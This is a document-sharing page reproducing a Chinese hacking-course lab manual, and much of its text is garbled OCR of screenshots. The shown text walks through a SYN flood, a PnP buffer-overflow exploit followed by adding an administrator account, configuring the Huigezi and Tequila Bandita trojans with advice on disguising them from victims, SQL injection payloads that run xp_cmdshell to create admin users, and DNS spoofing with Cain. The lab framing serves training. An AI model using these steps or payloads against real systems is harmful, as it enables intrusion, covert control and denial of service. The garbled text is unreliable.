技術(shù)人員培訓(xùn)實驗手冊(黑客攻擊課程)_第1頁
技術(shù)人員培訓(xùn)實驗手冊(黑客攻擊課程)_第2頁
技術(shù)人員培訓(xùn)實驗手冊(黑客攻擊課程)_第3頁
已閱讀5頁,還剩15頁未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報或認(rèn)領(lǐng)

文檔簡介

1、技術(shù)人員培訓(xùn)實驗手冊- 黑客攻擊課程實驗?zāi)夸泴嶒烆A(yù)備工具 31 VMWare 使用 32 EtherPeek NX 的使用 3黑客攻防實驗 51X-Scan 掃描工具應(yīng)用實驗 52Synflood 拒絕效勞實驗 63 緩沖區(qū)溢出實驗 74 灰鴿子木馬實驗 95 反向連接木馬實驗 136 蠕蟲掃描實驗 147 SQL 注入攻擊 158 欺騙攻擊實驗 16實驗預(yù)備工具1 VMWare 使用1選擇關(guān)閉虛擬機(jī)電源,選擇將虛擬機(jī)掛起,選擇啟動虛擬機(jī)。UJ越斗対1| Jll砂和T»MFT揺二J老晦晤為 i=;2點(diǎn)擊,虛擬機(jī)進(jìn)入全屏狀態(tài),按住Ctrl+Alt退出全屏。2 EtherPeek NX

2、的使用p1® BthMiP wki MC - SlMirl1按new capture,新建一個捕包任務(wù)。I 口匕 C.dt 蘭Wi1日 Sfl-nJ lEtb塑neb?* t>ilpm 凹國工l戲 曹鳥 Lr s o mGet Started-ICaptureOpen capture ifilc On AEZ20O7ia c£ 20s hl aiJWOO?角m! HiJpiO 口 wsctn13 OB Chip nt 孑:«2414TdiwI M二Il' J ri i.i ! ii 'h>*. !.!- n p t" 

3、7;- i-f2配置任務(wù)的屬性。選擇的網(wǎng)卡為欲捕獲數(shù)據(jù)包的網(wǎng)口。3點(diǎn)擊Start Capture,開始捕獲數(shù)據(jù)包。通過選擇不同的選項卡,從不同角度查看捕獲的數(shù)據(jù)包。(1)在windows系統(tǒng)上運(yùn)行X-Scan。黑客攻防實驗1 X-Scan掃描工具應(yīng)用實驗實驗環(huán)境:操作系統(tǒng):windows 2000/xp ;實驗工具:實驗步驟:(2) 設(shè)定掃描參數(shù)'t- ixK-. : li-T - 3 工 松豪俅 ;HluIme NTJAAayKrvaO、國龍上可氓疔二BTT手列廬電.羅扳74*3' ?于帝*ont .d上的:!:*Fb + hYM:.EJy 召丄電=.r 乙 * - 吐釉間m

4、; rua m Rfclhu mr a »a« , invu.ibavlwil 41(3) 運(yùn)行掃描點(diǎn)擊丄開始運(yùn)行掃描匚尸岡玄畔f7'世極on 舌*血 i#aj snsv普:*催處1B2 IDS. 1 gi號 iMii.eIM 1 3藥.和tb悄i 摘 性翅.潔齡程.寶ma宣】睡 MB. t £工4I正隹檢JdItT«F*<rl!»? J4Q ( 2SEI TT46Jrwr-5«trv*rii19-Z Jan L.lS3ZT3.1 i-iT If?I 2妙"3玉丄在*一匸|£眩 M 眩 Az.2 .-

5、.- z S=1至2 E TJ EU"lJ c-l_irr Tw.««白 d £ 2 日 3_1r 芒 * i «1 .X ! . - 11 -nnrBLr raL實驗結(jié)果:掃描結(jié)束后,得出掃描報告??刹榭幢粧呙柚鳈C(jī)存在的漏洞信息。2 Synflood拒絕效勞實驗實驗環(huán)境:操作系統(tǒng):wi ndows 2000 server 虛擬機(jī),wi ndows 2000/xp 實驗工具:syn flood實驗環(huán)境示意圖:實驗步驟:1在windows 2000 server虛擬機(jī)系統(tǒng)上運(yùn)行 Synflood。 synflood 不可運(yùn)行在windows XP

6、系統(tǒng)運(yùn)行cmd,定位synflood 路徑,本例中synflood 存放在C盤根目錄下, 因此格式為:C:> c:synflood.exe <攻擊目的IP>2在被攻擊主機(jī)上運(yùn)行EtherPeek,抓包的表現(xiàn)如下:運(yùn)行結(jié)果:虛擬多個IP主機(jī)攻擊目標(biāo)主機(jī),致使目標(biāo)主機(jī)資源耗盡。3 緩沖區(qū)溢出實驗實驗環(huán)境:操作系統(tǒng):windows 2000 server虛擬機(jī)被攻擊方主機(jī),windows 2000攻擊方主機(jī)實驗工具:X-Scan , pnpscan , pnp exp,遠(yuǎn)程桌面工具實驗環(huán)境示意圖:實驗步驟:1確定攻擊目標(biāo)。在攻擊方主機(jī)上運(yùn)行X-Scan掃描目標(biāo)主機(jī)上是否開放 445

7、, 139,3389 端口。-in|x|玄恤 iftfirw) hqo工鳳也w»x:)劃ni cjiw八礴13S/tciLK/ta44 r f! terIK'S/I J-JitDS7/lcpM3Mf 址 p'HTKIDS亂曲也亂rriTR務(wù)承同5«-:星囂杲昂執(zhí)舟&風(fēng)>oHrF-ilfnz.rflV詐Hr:Mtc.hf.TrtrJ(JlJl.:/l肌取。打.|1幵fFtntJIMK幵I;&ren, Pml Dffic. ProtcM-ulD.El.s.B.B.B.B.EB.B.B.l-f-H.B.r k 6 6- 6 b h k:h &

8、amp; 6 6- c h- 6 -n i s i ij 2於 g izsJ>r -J R -y *y $ 9 MV nM M $ fl o .v u 匚 g 卜 L lA ,- .3 -n L L-Lrrr L LLtL FltTLTG >翅Ll. iL+ 君iSB i.E2 a卑.4住庖14杵討i曰|菇曰少擔(dān) 當(dāng)勺此應(yīng). j:.山血笑削出皿| i nfEejEiwmijm host dtmd 1J J?匸jhBtjIM險邛ut tfread SjtDX nr-c(5jJ -扌2利用pnpscan掃描目標(biāo)主機(jī)的 445或139端口是否存在漏洞。3用pnp_exp進(jìn)行緩沖區(qū)溢出攻擊

9、,注意要在綁定IP中輸入攻擊主機(jī)的IP,綁定端口可輸入一些常規(guī)端口,例如:80,8080,21等來迷惑目標(biāo)主機(jī)的用戶。4溢出完畢后,在攻擊主機(jī)上可以看到已進(jìn)入目標(biāo)系統(tǒng)。5在命令行提示符下添加管理員賬號,命令如下:net user admin 123 /add 加用戶 添加的用戶名是 admin密碼是123net localgroup adm ini strators adm in /add 力口組6啟動遠(yuǎn)程桌面工具,利用添加的用戶,進(jìn)入目標(biāo)主機(jī)攻擊結(jié)果:獲得目標(biāo)主機(jī)超級管理員的權(quán)限。4灰鴿子木馬實驗實驗工具:操作系統(tǒng):windows 2000 server 虛擬機(jī)被攻擊方,windows xp

10、/2000 攻擊方實驗工具:灰鴿子實驗環(huán)境示意圖:實驗步驟:1配置效勞器端在攻擊方翻開灰鴿子客戶端。翻開配置程序配置效勞器端安裝路徑和安裝名稱可以修改,以到達(dá)迷惑被攻擊主機(jī)用戶的目的。選擇運(yùn)行后刪除安裝文件到達(dá)隱藏自身的目的。設(shè)置開機(jī)自動加載方式和關(guān)聯(lián)文件I丄一苗電JI I竺靈塹細(xì)設(shè)定捆綁文件,即在被攻擊主機(jī)上運(yùn)行效勞器端,用戶看到的是綁定的文件內(nèi)容。選中待配置的效勞器文件為灰鴿子自帶的Kernel32 。效勞器端程序配置成功。TTW 00000 no oo ooi oo JO oo00DO D 00 000000* -H烏Winrfgf盼習(xí)耳器瞬歡7CP I 評用:0% |A$W; 6B60

11、VK /233732K實驗結(jié)果:客戶端連接效勞器端,連接成功后,就可以控制被攻擊主機(jī)。在目標(biāo)機(jī)上運(yùn)行 Kernel32,翻開資源管理器可以看到Kernel32的進(jìn)程。應(yīng)月毘庫出瞳性屋 |2木馬植入將生成的效勞器端程序植入被攻擊系統(tǒng)。兀件日±in(Li荃馳 幫頃也3兇君土hji gj .竝止 0DIZPI 001建更進(jìn)巻W.srooLsy. eie m E<ltc axellssrv #» emd buTeg-5VC FTRnzla.K, t2Lei£ssvc cxe tMplcrtr. baand« exe個比弼Q oterai.r = "

12、; -= =一 , b-xaUU BT間 0 co co0:00:000.C0JBora- o:oo: U.UJ.C5EA7JG9C772ooc1052iuyt 11L 2H3Z1135 屹g3/TBCI5J0fi £ 15C 2JM 輕80S 3,O7£ 巳昭 % IM 1,320 4/1B-4 xn立gjf緒嚴(yán)時TE也屮Rd ; * " *爭Hl) : 1 鐘:1hit 1 I、匯趴牡:6*-止.:-:.丈岸F 曼旦日葦曲|H;| 丈帕 MKiXAli 電舸巴口匕翻3亦1衛(wèi)話lr*flpA P*oflTG Fte+韶It的孕Eil -國皿6 -理f 応適_jI

13、 "SJj戈|其 CT0十和*+ Be rivinti uidl 3二實百 faP.I>« bhJOT5-3E-3O LA X± _| 口*:2M-i£aa w <3E 2j gpJjEatinh如噲® L2昭2j扣卜卩也i 斗:|斤 5 M Fil"!.301<-33 14 B亠1 Sysi wIiKl?-E-» 13 IT_|*IHHI!2M£*2O 15 晳 dl% it!.LSKflSMXPM 12 «2 WCI-"Jp #w邨LEI£13/1 畑IK L2

14、CBpXJTMXX MJQ53?-Z-3J IE 肝國 beol i du2W1A3J t2 39a|ka-s.tg'BeLi Wa切imL2 ®刮UBH#亦Daoifi-ir-aa 直 幅2 SISCw-ira> 12 叩國整口匹ST:02J:mH LS 換*JJfTnmcT enui££ d -CS- Qt- lE <3&首 rtt?在:匚.5反向連接木馬實驗實驗環(huán)境:操作系統(tǒng):windows 2000 server 虛擬機(jī)被攻擊方,windows xp/2000 攻擊方 實驗工具:tequila ban dita(tb)實驗環(huán)境示

15、意圖:廠 Inject (FWE+)ExplorerC Browser17 Melt硬 ActiveX Startup r EnaNe Key Spy 回 Wait Until Online7 Compress (UPX)實驗步驟:(1)翻開tequila bandita tb丨木馬客戶端,選擇菜單項選擇項-生成效勞器端。注意IP地址欄填寫攻擊方的IP。端口可以填入一些常規(guī)端口,如80,8080, 21等迷惑被攻擊方用戶。Create ServerMain Settys 艸需淚廬冃飾IP:E汪:|w inho5t32.exe: ActiveX Key(2)連接效勞器端成功后,在客戶端如下顯示:

16、實驗結(jié)果:控制目標(biāo)主機(jī)。沽g LT Fl 恥TT ILtJi:坯:須JU 田MW"-|C| xIP|用戶:丨連接:1 強(qiáng).1 曲.£VEJLSIRAIN - A. LWJWin2k6蠕蟲掃描實驗實驗環(huán)境:操作系統(tǒng):wi ndows 2000 server實驗工具:n map實驗步驟: 用nmap模擬蠕蟲的掃描過程,本例中以掃描445端口為例。命令如下:nmap路徑-sP - 注:使用 -sP"命令,進(jìn)行ping掃描,PT"選項可以對網(wǎng)絡(luò)上指定端口進(jìn)行掃描Host TEST ClZ劃?appears to be udHiirtp run 25& I

17、P dddnfvcvt <3 InieLv up> ginwd Li 1? i£«cundlvhsxlinciimcnts nnd Setti rsXl FSMJI ;甲怪人鬼琨、勢詰村科甘1插器.陽町“吋卩亦卜尸 一FT呷專勺 172.1&B.1_HZ24ICF pjbe ipuirt 44!?RmrEin nenp U« 2111129 < iahj G in<4>eHikr« xnrg/nm)> >11 npLfalc- fe if iiiifl niivinpacrvicri? Rrna-Tf i

18、n qt t* Z< /a fi-rv ic<npAlirtlhKi Ciruld. not det: om in uJuit int Brf acv tu route pAceC: e 右Iifoli;牙i to 192 - 166 iQ> cltangLny pln CcunCs/ps to ICtfF onlyhenrtCG in! s&ndplnisiqueiy Ef r>畝 al («houl4 he S>ttfinrlt»£ Hn auichi file dJireEtoi*)i卜輕nilte in kirnvlp

19、ingiifreturnipd -1<hinlIwb A5?1 卵dg; Hq 年mJi fil$ or* d!l¥£tOF<*iH ost I EM-9 3 A6 5981F1 fi <192.165.1 £ ppsaii*s ta he up.Host OHULi lHfl lN (11I2 .1I&B4ppcw3 to he up,Hu&l TES1Afljeat-X tn Lierun coni»lotad 256 IP addrooiso <3 M«ts u> canhod in 3S B

20、BCDindlGb : Xllhicume111. £ mid S>e t L ijigs: Xl BM >s出現(xiàn)Host *IP地址appears to be up. 代表*主機(jī)此端口翻開。實驗結(jié)果:捕包結(jié)果如下:7 SQL注入攻擊實驗環(huán)境:操作系統(tǒng):wi ndows 2000 server實驗工具:無實驗環(huán)境示意圖:虛擬機(jī)被攻擊方,windows xp/2000攻擊方實驗步驟:1準(zhǔn)備條件把 IE 菜單 =>工具 =>Internet選項 => 高級 =>顯示友好錯誤信息前面的勾去掉。否那么,不管效勞器返回什么錯誤, IE 都只顯示為 500 效

21、勞器錯誤,不能獲得 更多的提示信息。2判斷能否可以進(jìn)行SQL注入可利用以下測試方法測試: :/showdetail.asp?id=49 :/showdetail.asp?id=49 and 1=1 :/showdetail.asp?id=49 and 1=2 這就是經(jīng)典的 1=1、1=2測試法了,可以注入的表現(xiàn): 正常顯示 正常顯示,內(nèi)容根本與相同 提示BOF或EOF程序沒做任何判斷時、或提示找不到記錄判斷了rs.eof時、或顯示內(nèi)容為空程序加了 on error resume next 3判斷數(shù)據(jù)庫類型及注入方法 分別在地址欄中輸入以下網(wǎng)址探測::/showdetail.asp?id=49

22、and (select count(*) from sysobjects)>0 :/showdetail.asp?id=49 and (select count(*) from msysobjects)>0 如果數(shù)據(jù)庫是SQLServer,第一個網(wǎng)址的頁面與原頁面 :/showdetail.asp?id=49大致相同;而第二個網(wǎng)址會提示出錯,就算程序有容錯處理,頁面也與原頁面完全不同。如果數(shù)據(jù)庫用的是 Access ,第一個網(wǎng)址的頁面與原頁面完全不同;第二個網(wǎng)址 與原網(wǎng)址也是完全不同。 大多數(shù)情況下, 用第一個網(wǎng)址就可以得知系統(tǒng)所用的數(shù)據(jù)庫類 型,第二個網(wǎng)址只作為開啟 IIS 錯誤

23、提示時的驗證。(4) 利用系統(tǒng)表注入 SQLServer 數(shù)據(jù)庫 用net命令新建了用戶名為 name密碼為password的windows的帳號:/Site/url.asp?id=1;execmaster.xp_cmdshell“ net user namepassword /add - 將新建的帳號name參加管理員組:/Site/url.asp?id=1;exec master.xp_cmdshell“net localgroup nameadministrators /add -這種方法只適用于用 sa 連接數(shù)據(jù)庫的情況, 否那么,是沒有權(quán)限調(diào)用 xp_cmdshell 的。實驗結(jié)果:

24、獲得被攻擊系統(tǒng)超級權(quán)限。8 欺騙攻擊實驗實驗環(huán)境操作系統(tǒng): Windows 2000 虛擬機(jī)攻擊方主機(jī) , windows xp/2000 被攻擊方主機(jī) 實驗工具: EtherPeek NX (抓包工具 ), Cain&Abel ( 黑客工具 )實驗環(huán)境示意圖:實驗步驟1翻開 EtherPeek NX 選擇 New Capture,選擇 capture->capture options,設(shè)置 filter 的 條件。丫兇Captuirc OptionsG«nar oJ.九也.pt. ar |Xcicc>ptTari gark Fil ters 5 tiati Et

25、a. qe OutputBTtly packa ts in at chi ng at 1 aavt oneriiis iUUD 口口N6PApplTMk h日P pftckvt?reninskin曰i口玉卩時k*Nh=4vvre:NHVre pacl曰宮MuflioM Phyoioftl rnutioaot pa0*SI: OGI »ackctv1 l 匚np/ of IPIP. 口|M玉 pACkPt4?口 DECnet=DFCrist psck&ls口 DHCP;DHCP packets:S DhISTiSi也品皿巨jb-ICI-binor pRckets口 FTPJ 卜

26、 TP dsrla or cortrol jackets 1口 HTTPHTTP 叱!<呂口 KW1 IPIBP.DNUMMcIn AppteTIK_ AtpIcTflIK AupIcTsik 口io勺日gotPoGkcts to liCjApiolcTalk b慶Dsdu帝融Physical I呂、呂f trcrsictiats婀址 _IL酈自I 幫肋 I2雙擊DNS編輯過濾條件,即協(xié)議類型是DNS,地址是 192.1682210。3在被攻擊主機(jī)上測試pingsohu,抓包表現(xiàn)如下:F ! EdA 些CatuEH 's-ard Mbnikn- LdcJh g'indCT

27、M一 | 占&C |琴畫型 4 A 鼻-廠玉3 口* *!>亡I TlffrieFi>-r!VT1EtlFmMID 3SO6bt血SiH0 33:35NiC-JMg訊弊a疔1幻也0嚇.10:3(:01 -(fi". Xiin rCliw專囂4翻開虛擬機(jī),啟動Cain,選中sniffer,點(diǎn)擊運(yùn)行sniffer,掃描本網(wǎng)段內(nèi)的主機(jī)。雙擊一條記錄,可以看到目的DNS效勞器的 MAC地址。本例中顯示的是被攻擊主機(jī)的DNS效勞器的 MAC 地址為 00 OE 0C 69 F5 79。" LtibcrPeck hx - LuptuPE £ Pocket |«1-IQI2SJ£ tlr 當(dāng)昶 上訃 口1趙 HnU Qsitw Lwb-口占5選擇 Sniffer 選項,ARP >DNS6選擇 Add to list, DNS Name Requested 填入 response packets 填入venustech。當(dāng)被攻擊主機(jī)訪問venu stechvenu stechsohu,IP add

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論